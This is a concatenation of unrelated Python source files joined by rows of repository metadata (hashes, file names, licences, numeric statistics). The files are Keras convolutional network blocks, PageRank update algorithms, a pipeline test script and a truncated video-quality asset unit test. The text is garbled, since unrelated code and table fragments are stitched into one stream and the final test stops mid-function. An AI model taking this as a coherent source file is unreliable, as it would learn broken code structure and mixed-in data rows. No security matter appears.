x = self.block2_seq3(x)
#x = self.block1_seq4(x)
x = self.block2_seq4(x)
'''
x = self.block1_seq5(x)
x = self.block2_seq5(x)
x = self.block2_seq5_2(x)
x = self.block1_seq6(x)
x = self.block2_seq6(x)
x = self.block2_seq6_2(x)
'''
output = self.module5(x)
return output
class Block1(Model):
def __init__(self, conf, rate, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Block1, self).__init__()
# Design layers.
self.module1 = Module1(conf, rate, nc)
self.module2 = Module2(conf, rate, int(nc * 2))
self.module3 = Module3(conf, int(nc * 2))
self.module4 = Module4(conf, rate, int(nc * 2))
def call(self, input_tensor):
x2 = self.module1(input_tensor)
x3 = self.module2(x2)
x4 = self.module3(x2)
x5 = self.module4([x3, x4])
return x5
class Block2(Model):
def __init__(self, conf, rate, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Block2, self).__init__()
# Design layers.
self.module2 = Module2(conf, rate, nc)
self.module3 = Module3(conf, nc)
self.module4 = Module4(conf, rate, nc)
self.module7 = Module7(conf, rate, nc)
def call(self, input_tensor):
x2 = self.module2(input_tensor)
x3 = self.module3(x2)
x4 = self.module4([x2, x3])
x5 = self.module7([input_tensor, x4])
return x5
class Block3(Model):
def __init__(self, conf, rate, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Block3, self).__init__()
# Design layers.
self.module6 = Module6(conf, nc)
self.module2 = Module2(conf, rate, nc)
self.module3 = Module3(conf, nc)
self.module4 = Module4(conf, rate, nc)
self.module7 = Module7(conf, rate, nc)
def call(self, input_tensor):
x2 = self.module6(input_tensor)
x3 = self.module2(x2)
x4 = self.module3(x2)
x5 = self.module4([x3, x4])
x6 = self.module7([input_tensor, x5])
return x6
class Module1(Model):
def __init__(self, conf, rate, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Module1, self).__init__()
# Design layers.
self.sep_conv2d_1 = SeparableConv2D(nc
, kernel_size=3
, depth_multiplier=1
, dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier']
, rate[1] * self.nn_arch['conv_rate_multiplier'])
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal())
self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_1 = Activation('relu')
self.conv2d_2 = Conv2D(int(nc * 2)
, kernel_size=3
, strides=2
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal()
, kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
self.bn_2 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_2 = Activation('relu')
def call(self, input_tensor):
x = self.sep_conv2d_1(input_tensor)
x = self.bn_1(x)
x = self.act_1(x)
x = self.conv2d_2(x)
x = self.bn_2(x)
x = self.act_2(x)
return x
class Module2(Model):
def __init__(self, conf, rate, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Module2, self).__init__()
# Design layers.
self.conv2d_1 = Conv2D(int(nc * 2)
, kernel_size=3
, dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier']
, rate[1] * self.nn_arch['conv_rate_multiplier'])
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal())
self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_1 = Activation('relu')
self.conv2d_2 = Conv2D(np.maximum(1, int(nc / 2 * 2))
, kernel_size=3
, strides=1
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal()
, kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
self.bn_2 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_2 = Activation('relu')
self.depthwise_conv2d_3 = DepthwiseConv2D(kernel_size=3
, depth_multiplier=1
, dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier']
, rate[1] * self.nn_arch['conv_rate_multiplier'])
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal())
self.bn_3 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_3 = Activation('relu')
def call(self, input_tensor):
x = self.conv2d_1(input_tensor)
x = self.bn_1(x)
x = self.act_1(x)
x = self.conv2d_2(x)
x = self.bn_2(x)
x = self.act_2(x)
x = self.depthwise_conv2d_3(x)
x = self.bn_3(x)
x = self.act_3(x)
return x
class Module3(Model):
def __init__(self, conf, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Module3, self).__init__()
# Design layers.
self.global_avg_pool2d_1 = GlobalAveragePooling2D() # data_format?
self.reshape_1 = Reshape((1, 1, nc))
self.conv2d_1 = Conv2D(np.maximum(1, int(nc / 4))
, kernel_size=1
, strides=1
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal()
, kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
self.conv2d_2 = Conv2D(nc
, kernel_size=1
, strides=1
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal()
, kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
def call(self, input_tensor):
x = self.global_avg_pool2d_1(input_tensor)
x = self.reshape_1(x)
x = self.conv2d_1(x)
x = self.conv2d_2(x)
return x
class Module4(Model):
def __init__(self, conf, rate, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Module4, self).__init__()
# Design layers.
self.multiply_1 = Multiply()
self.conv2d_1 = Conv2D(np.maximum(1, int(nc))
, kernel_size=3
, dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier']
, rate[1] * self.nn_arch['conv_rate_multiplier'])
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal())
self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_1 = Activation('relu')
def call(self, inputs):
# Check exception.
x = inputs
if isinstance(x, list) != True or len(x) != 2:
raise ValueError('Input must be a list of two tensors.')
x = self.multiply_1([x[0], x[1]])
x = self.conv2d_1(x)
x = self.bn_1(x)
x = self.act_1(x)
return x
class Module5(Model):
def __init__(self, conf, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Module5, self).__init__()
# Design layers.
self.conv2d_1 = Conv2D(nc
, kernel_size=3
, strides=1
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal()
, kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
def call(self, input_tensor):
x = self.conv2d_1(input_tensor)
return x
class Module6(Model):
def __init__(self, conf, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Module6, self).__init__()
# Design layers.
self.upsampling2d_1 = UpSampling2D()
self.conv2d_1 = Conv2D(nc
, kernel_size=3
, strides=1
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal()
, kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_1 = Activation('relu')
def call(self, input_tensor):
x = self.upsampling2d_1(input_tensor)
x = self.conv2d_1(x)
x = self.bn_1(x)
x = self.act_1(x)
return x
class Module7(Model):
def __init__(self, conf, rate, nc):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
super(Module7, self).__init__()
# Design layers.
self.add_1 = Add()
self.conv2d_1 = Conv2D(nc
, kernel_size=3
, dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier']
, rate[1] * self.nn_arch['conv_rate_multiplier'])
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal())
self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_1 = Activation('relu')
def call(self, inputs):
# Check exception.
x = inputs
if isinstance(x, list) != True or len(x) != 2:
raise ValueError('Input must be a list of two tensors.')
x = self.add_1([x[0], x[1]])
x = self.conv2d_1(x)
x = self.bn_1(x)
x = self.act_1(x)
return x
| 31.424632
| 117
| 0.520796
| 1,897
| 17,095
| 4.474433
| 0.084344
| 0.05278
| 0.02262
| 0.038878
| 0.823516
| 0.753652
| 0.732446
| 0.723374
| 0.711828
| 0.692389
| 0
| 0.03447
| 0.360222
| 17,095
| 544
| 118
| 31.424632
| 0.741611
| 0.085581
| 0
| 0.724138
| 0
| 0
| 0.06545
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.021944
| 0
| 0.159875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20b36eac06c9f8734a53dbcfa544f8d4f758c008
| 6,029
|
py
|
Python
|
updateAlgos.py
|
estbautista/SSL_tracking_analytic
|
8fe631c40596264a69a4d2c584e4444d9ea1e0c8
|
[
"MIT"
] | null | null | null |
updateAlgos.py
|
estbautista/SSL_tracking_analytic
|
8fe631c40596264a69a4d2c584e4444d9ea1e0c8
|
[
"MIT"
] | null | null | null |
updateAlgos.py
|
estbautista/SSL_tracking_analytic
|
8fe631c40596264a69a4d2c584e4444d9ea1e0c8
|
[
"MIT"
] | null | null | null |
import numpy as np
from numpy import inf
import random
def GS_update(graph_init, graph_evol, eps, alpha, method, opt, mode) :
# initial distribution
N = graph_init.A.shape[0]
flops = 0
# extract operator and coefficients
if method == 'PageRank':
mu = (1-alpha)/alpha
psi = -2/(2*mu + 2)
rho = (2*mu)/(2*mu + 2)
OP_dif = np.array(-graph_evol.P.T + graph_init.P.T)
OP_evol = np.array(-graph_evol.P.T)
OP_init = np.array(-graph_init.P.T)
gt_init = np.array(graph_init.pr.T)
gt_evol = np.array(graph_evol.pr.T)
deg = np.count_nonzero(graph_init.P.T, axis=1)
elif method == 'GammaPageRank':
mu = (1-alpha)/alpha
psi = -10/(2*mu + 10)
rho = (2*mu)/(2*mu + 10)
OP_dif = np.array(graph_evol.Op_shift - graph_init.Op_shift)
OP_evol = np.array(graph_evol.Op_shift)
OP_init = np.array(graph_init.Op_shift)
gt_init = np.array(graph_init.gpr)
gt_evol = np.array(graph_evol.gpr)
deg = np.count_nonzero(graph_evol.Op_shift, axis=1)
print('---- Edges changed ----')
print('Edges init : ', np.count_nonzero(OP_dif - OP_evol) )
print('Edges Changed : ', np.count_nonzero(OP_dif) )
print('Edges evol : ', np.count_nonzero(OP_evol) )
# compute initial distribution (assuming p(0) = 0)
if opt == 'track' :
p = np.array(graph_init.p_gs)
r = np.array(graph_init.r_gs + psi*(OP_dif.dot(p)))
nnz = np.where(p != 0)[0]
flops = flops + np.count_nonzero(p) + np.count_nonzero(OP_dif[:,nnz]) + np.count_nonzero(OP_dif.dot(p))
elif opt == 'exact' :
p = np.array(gt_init)
r = np.array(psi*OP_dif.dot(p))
nnz = np.where(p != 0)[0]
flops = flops + np.count_nonzero(p) + np.count_nonzero(OP_dif[:,nnz]) + np.count_nonzero(OP_dif.dot(p))
it = 0
activeNodes = np.where(graph_evol.clust_memb > 0)[0]
if mode == 'FixedError' :
while (np.linalg.norm(p[activeNodes] - gt_evol[activeNodes] ,ord=2)/np.linalg.norm(gt_evol[activeNodes],ord=2)) > eps :
if np.count_nonzero(OP_dif) == 0:
break
it += 1
ix_u = np.argmax(abs(r))
r_u = float(r[ix_u])
p[ix_u] += r_u
r[ix_u] = 0;
r = r + np.expand_dims(psi*r_u*OP_evol[:,ix_u],1)
flops = flops + 2*np.count_nonzero(OP_evol[:,ix_u]) + np.int(deg[ix_u])
elif mode == 'FixedFlops':
while flops < eps :
if np.count_nonzero(OP_dif) == 0:
break
it += 1
ix_u = np.argmax(abs(r))
r_u = float(r[ix_u])
p[ix_u] += r_u
r[ix_u] = 0;
r = r + np.expand_dims(psi*r_u*OP_evol[:,ix_u],1)
flops = flops + 2*np.count_nonzero(OP_evol[:,ix_u]) + np.int(deg[ix_u])
if it == 0:
flops = 1
change = np.count_nonzero(OP_dif)/np.count_nonzero(OP_init)
err = np.linalg.norm(p[activeNodes] - gt_evol[activeNodes], ord=2)/np.linalg.norm(gt_evol[activeNodes])
print('---- Gauss Soutwell Update ----')
print('iter =', it)
print('flops =', flops)
print('err =', err)
return p, r, it, flops, change, err
def PI_update(graph_init, graph_evol, eps, alpha, method, opt, mode):
# initial distribution
N = graph_init.A.shape[0]
flops = 0
# extract operator and coefficients
if method == 'PageRank':
mu = (1-alpha)/alpha
psi = -2/(2*mu + 2)
rho = (2*mu)/(2*mu + 2)
OP_dif = np.array( -graph_evol.P.T + graph_init.P.T )
OP_evol = np.array( -graph_evol.P.T )
OP_init = np.array( -graph_init.P.T )
gt_init = np.array( graph_init.pr.T )
gt_evol = np.array( graph_evol.pr.T )
elif method == 'GammaPageRank':
mu = (1-alpha)/alpha
psi = -10/(2*mu + 10)
rho = (2*mu)/(2*mu + 10)
OP_dif = np.array( graph_evol.Op_shift - graph_init.Op_shift )
OP_evol = np.array( graph_evol.Op_shift )
OP_init = np.array( graph_init.Op_shift )
gt_init = np.array( graph_init.gpr )
gt_evol = np.array( graph_evol.gpr )
print('---- Edges changed ----')
print('Edges init : ', np.count_nonzero(OP_dif - OP_evol) )
print('Edges Changed : ', np.count_nonzero(OP_dif) )
print('Edges evol : ', np.count_nonzero(OP_evol) )
activeNodes = np.where(graph_evol.clust_memb > 0)[0]
# compute initial distribution (assuming p(0) = 0)
if opt == 'track' :
p = np.array( graph_init.p_pi )
r = np.array( psi*(OP_dif.dot(p)) )
nnz = np.where(p[activeNodes] != 0)[0]
flops = flops + np.count_nonzero(OP_dif.dot(p)) + np.count_nonzero(OP_dif[:,nnz])
elif opt == 'exact' :
p = np.array( gt_init )
r = np.array( psi*(OP_dif.dot(p)) )
nnz = np.where(p[activeNodes] != 0)[0]
flops = flops + np.count_nonzero(OP_dif.dot(p)) + np.count_nonzero(OP_dif[:,nnz])
it = 0
p_tmp = np.zeros([N,1])
if mode == 'FixedError':
while (np.linalg.norm(p[activeNodes] + (p_tmp[activeNodes]/rho) - gt_evol[activeNodes],ord=2)/np.linalg.norm(gt_evol[activeNodes],ord=2)) > eps :
if np.count_nonzero(OP_dif) == 0:
break
it += 1
if it > 1e4:
flops = float('NaN')
p_tmp = np.zeros([N,1])
break
# count the flops
nnz = np.where(p_tmp != 0)[0]
flops_dotprod = np.count_nonzero(OP_evol[:,nnz])
flops_scaling = np.count_nonzero(p_tmp) + np.count_nonzero(r)
flops_addition = np.count_nonzero(OP_evol.dot(p)) + np.count_nonzero(r)
flops = flops + flops_dotprod + flops_scaling + flops_addition
# next iteration
p_tmp = rho*r + psi*OP_evol.dot(p_tmp)
elif mode == 'FixedFlops':
while flops < eps :
if np.count_nonzero(OP_dif) == 0:
break
it += 1
# count the flops
nnz = np.where(p_tmp != 0)[0]
flops_dotprod = np.count_nonzero(OP_evol[:,nnz])
flops_scaling = np.count_nonzero(p_tmp) + np.count_nonzero(r)
flops_addition = np.count_nonzero(OP_evol.dot(p)) + np.count_nonzero(r)
flops = flops + flops_dotprod + flops_scaling + flops_addition
# next iteration
p_tmp = rho*r + psi*OP_evol.dot(p_tmp)
p = p + (p_tmp/rho)
flops = flops + np.count_nonzero(p_tmp)
if it == 0:
flops = 1
change = np.count_nonzero(OP_dif)/np.count_nonzero(OP_init)
err = np.linalg.norm(p[activeNodes] - gt_evol[activeNodes],ord=2)/np.linalg.norm(gt_evol[activeNodes],ord=2)
print('---- Power Iteration Update ----')
print('iter =', it)
print('flops =', flops)
print('err =', err)
return p, it, flops, change, err
| 31.565445
| 147
| 0.650688
| 1,048
| 6,029
| 3.545802
| 0.09542
| 0.073466
| 0.146932
| 0.12056
| 0.937029
| 0.924381
| 0.910657
| 0.910657
| 0.910657
| 0.872443
| 0
| 0.018339
| 0.176978
| 6,029
| 190
| 148
| 31.731579
| 0.730552
| 0.044618
| 0
| 0.844595
| 0
| 0
| 0.058445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013514
| false
| 0
| 0.02027
| 0
| 0.047297
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
454a1f5c59325f786ffa898b612c692d2abc5ac9
| 142
|
py
|
Python
|
joeutils/state_management/__init__.py
|
joeflack4/joefuncs
|
937107bb8b47d6ba4c1fb4ec598bda1211deb5c4
|
[
"MIT"
] | null | null | null |
joeutils/state_management/__init__.py
|
joeflack4/joefuncs
|
937107bb8b47d6ba4c1fb4ec598bda1211deb5c4
|
[
"MIT"
] | 1
|
2021-06-01T22:45:31.000Z
|
2021-06-01T22:45:31.000Z
|
joeutils/state_management/__init__.py
|
joeflack4/joefuncs
|
937107bb8b47d6ba4c1fb4ec598bda1211deb5c4
|
[
"MIT"
] | 1
|
2022-01-04T14:37:29.000Z
|
2022-01-04T14:37:29.000Z
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""State Management"""
from joeutils.state_management import the, assign, print_state_history
| 28.4
| 70
| 0.732394
| 19
| 142
| 5.315789
| 0.842105
| 0.29703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.105634
| 142
| 4
| 71
| 35.5
| 0.787402
| 0.429577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
4571bf1a257a3ae7cfc207d1cb9944549df70ac1
| 3,846
|
py
|
Python
|
test/multistage-test.py
|
coreyjadams/harvard_production
|
233f20ef62ca34375f09417f4a507aa977c53a2a
|
[
"MIT"
] | null | null | null |
test/multistage-test.py
|
coreyjadams/harvard_production
|
233f20ef62ca34375f09417f4a507aa977c53a2a
|
[
"MIT"
] | null | null | null |
test/multistage-test.py
|
coreyjadams/harvard_production
|
233f20ef62ca34375f09417f4a507aa977c53a2a
|
[
"MIT"
] | 1
|
2018-10-15T16:44:55.000Z
|
2018-10-15T16:44:55.000Z
|
import os
import yaml
from config import ProjectConfig
from utils import ProjectHandler
from database import DBUtil
# This script tests the multistage input/output flow.
# It generates fake data (empty files) based on the configuration
def part1():
# parse the configuration file:
config_file = '/home/cadams/Harvard-Production/yml-configs/bnb_plus_cosmics-multistage-test.yml'
config = ProjectConfig(config_file)
# Print out the stages to run over:
for name, stage in config.stages.iteritems():
# Create a handler to check files and such
handler = ProjectHandler(config_file, action='status', stage=name)
handler.build_directory()
handler.first_stage_check()
db = handler.project_db
print('Faking stage {0}'.format(stage.name))
print(' Input specified? {0}'.format( stage.has_input()))
#Make sure output directory exists:
out_dir = stage.output_directory()
handler.make_directory(out_dir)
# Generate fake output for this stage:
for i in range(stage.n_jobs()):
for fcl in stage.fcl():
fcl = os.path.basename(fcl)
_f = '/{0}_fake_{1}.root'.format(fcl, i)
# Input
if stage.has_input():
input_files, locations = stage.get_next_files(1, db)
print('Input files are: \n {0}'.format(input_files))
# Processing
# Nothing actually happens
# Output
with open(out_dir + _f, 'w') as file:
pass
# Declare the file to the database:
db.declare_file(filename=_f,
dataset=stage.output_dataset(),
location=out_dir,
stage=name,
status=0,
nevents=10,
ftype=0)
# Mark the input files as consumed:
if stage.has_input():
stage.finalize(input_files, db)
def part2():
# parse the configuration file:
config_file = '/home/cadams/Harvard-Production/yml-configs/bnb_plus_cosmics-multistage-test_part2.yml'
config = ProjectConfig(config_file)
# Print out the stages to run over:
for name, stage in config.stages.iteritems():
handler = ProjectHandler(config_file, action='status', stage=name)
handler.build_directory()
handler.first_stage_check()
db = handler.project_db
print('Faking stage {0}'.format(stage.name))
print(' Input specified? {0}'.format( stage.has_input()))
#Make sure output directory exists:
out_dir = stage.output_directory()
handler.make_directory(out_dir)
# Generate fake output for this stage:
for i in range(stage.n_jobs()):
for fcl in stage.fcl():
fcl = os.path.basename(fcl)
_f = '/{0}_fake_{1}.root'.format(fcl, i)
# Input
if stage.has_input():
input_files, locations = stage.get_next_files(1, db)
# Processing
# Nothing actually happens
# Output
with open(out_dir + _f, 'w') as file:
pass
# Declare the file to the database:
db.declare_file(filename=_f,
dataset=stage.output_dataset(),
location=out_dir,
stage=name,
status=0,
nevents=10,
ftype=0)
# Mark the input files as consumed:
if stage.has_input():
stage.finalize(input_files, db)
def main():
part1()
part2()
if __name__ == '__main__':
main()
| 30.52381
| 106
| 0.555382
| 434
| 3,846
| 4.760369
| 0.25576
| 0.023233
| 0.037754
| 0.029042
| 0.849952
| 0.849952
| 0.849952
| 0.849952
| 0.849952
| 0.849952
| 0
| 0.009646
| 0.353094
| 3,846
| 126
| 107
| 30.52381
| 0.82074
| 0.171607
| 0
| 0.782609
| 1
| 0
| 0.102434
| 0.052482
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0.028986
| 0.072464
| 0
| 0.115942
| 0.072464
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
45a1e284cbdff669adafe833488267a543e5099e
| 22,289
|
py
|
Python
|
python/test/asset_test.py
|
lunlun1992/vmaf
|
efb80822c6a7d8431928404be68a32a1f1574311
|
[
"Apache-2.0"
] | null | null | null |
python/test/asset_test.py
|
lunlun1992/vmaf
|
efb80822c6a7d8431928404be68a32a1f1574311
|
[
"Apache-2.0"
] | null | null | null |
python/test/asset_test.py
|
lunlun1992/vmaf
|
efb80822c6a7d8431928404be68a32a1f1574311
|
[
"Apache-2.0"
] | null | null | null |
__copyright__ = "Copyright 2016, Netflix, Inc."
__license__ = "Apache, Version 2.0"
import unittest
import re
import config
from core.asset import Asset
class AssetTest(unittest.TestCase):
def test_workdir(self):
import re
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={}, workdir_root="my_workdir_root")
workdir = asset.workdir
self.assertTrue(re.match(r"^my_workdir_root/[a-zA-Z0-9-]+$", workdir))
def test_ref_width_height(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'ref_width':1920, 'ref_height':1080,})
self.assertEquals(asset.ref_width_height, (1920, 1080))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'ref_width':1920, 'ref_height':1080,
'width':720, 'height':480})
self.assertEquals(asset.ref_width_height, (1920, 1080))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict= {'width':720, 'height':480})
self.assertEquals(asset.ref_width_height, (720, 480))
def test_dis_width_height(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'dis_width':1920, 'dis_height':1080,})
self.assertEquals(asset.dis_width_height, (1920, 1080))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'dis_width':1920, 'dis_height':1080,
'width':720, 'height':480})
self.assertEquals(asset.dis_width_height, (1920, 1080))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict= {'width':720, 'height':480})
self.assertEquals(asset.dis_width_height, (720, 480))
def test_quality_width_height(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={"ref_width":1920, "ref_height":1080,
"dis_width":720, "dis_height":480},)
with self.assertRaises(AssertionError):
print asset.quality_width_height
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={"ref_width":1920, "ref_height":1080,
"dis_width":720, "dis_height":480,
"quality_width":1280, "quality_height":720},)
self.assertEquals(asset.quality_width_height, (1280, 720))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={"ref_width":720, "ref_height":480,
"dis_width":720, "dis_height":480,},)
self.assertEquals(asset.quality_width_height, (720, 480))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={"width":720, "height":480,},)
self.assertEquals(asset.quality_width_height, (720, 480))
def test_start_end_frame(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'ref_start_frame':2, 'ref_end_frame':2,
'dis_start_frame':3, 'dis_end_frame':3},)
self.assertEquals(asset.ref_start_end_frame, (2, 2))
self.assertEquals(asset.dis_start_end_frame, (3, 3))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'start_frame':2, 'end_frame':2})
self.assertEquals(asset.ref_start_end_frame, (2, 2))
self.assertEquals(asset.dis_start_end_frame, (2, 2))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'fps':24, 'duration_sec':2})
self.assertEquals(asset.ref_start_end_frame, (0, 47))
self.assertEquals(asset.dis_start_end_frame, (0, 47))
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'fps':24, 'start_sec':2, 'end_sec': 3})
self.assertEquals(asset.ref_start_end_frame, (48, 71))
self.assertEquals(asset.dis_start_end_frame, (48, 71))
def test_duration_sec(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'ref_start_frame':2, 'ref_end_frame':2,
'dis_start_frame':3, 'dis_end_frame':3},)
self.assertEquals(asset.ref_duration_sec, None)
self.assertEquals(asset.dis_duration_sec, None)
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'ref_start_frame':0, 'ref_end_frame':23,
'dis_start_frame':3, 'dis_end_frame':26,
'fps':24},)
self.assertEquals(asset.ref_duration_sec, 1.0)
self.assertEquals(asset.dis_duration_sec, 1.0)
def test_bitrate(self):
ref_path = config.ROOT + "/resource/yuv/src01_hrc00_576x324.yuv"
dis_path = config.ROOT + "/resource/yuv/src01_hrc01_576x324.yuv"
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path=ref_path, dis_path=dis_path,
asset_dict={'ref_start_frame':0, 'ref_end_frame':47,
'dis_start_frame':0, 'dis_end_frame':47,
'fps':23.976},)
self.assertAlmostEquals(asset.ref_bitrate_kbps_for_entire_file,
53693.964287999996, places=4)
self.assertAlmostEquals(asset.dis_bitrate_kbps_for_entire_file,
53693.964287999996, places=4)
def test_to_normalized_dict(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'start_frame':2, 'end_frame':2})
self.assertEquals(
asset.to_normalized_dict(),
{'asset_dict': {'end_frame': 2, 'height': 480,
'start_frame': 2, 'width': 720},
'asset_id': 0,
'content_id': 0,
'dataset': 'test',
'dis_path': 'disvideo.yuv',
'ref_path': 'refvideo.yuv',
'workdir': ''
}
)
def test_to_normalized_dict_10le(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="dir/refvideo.yuv420p10le.yuv",
dis_path="dir/disvideo.yuv420p10le.yuv",
asset_dict={'width':720, 'height':480,
'start_frame':2, 'end_frame':2})
self.assertEquals(
asset.to_normalized_dict(),
{'asset_dict': {'end_frame': 2, 'height': 480,
'start_frame': 2, 'width': 720},
'asset_id': 0,
'content_id': 0,
'dataset': 'test',
'dis_path': 'disvideo.yuv420p10le.yuv',
'ref_path': 'refvideo.yuv420p10le.yuv',
'workdir': ''
}
)
def test_str_repr(self):
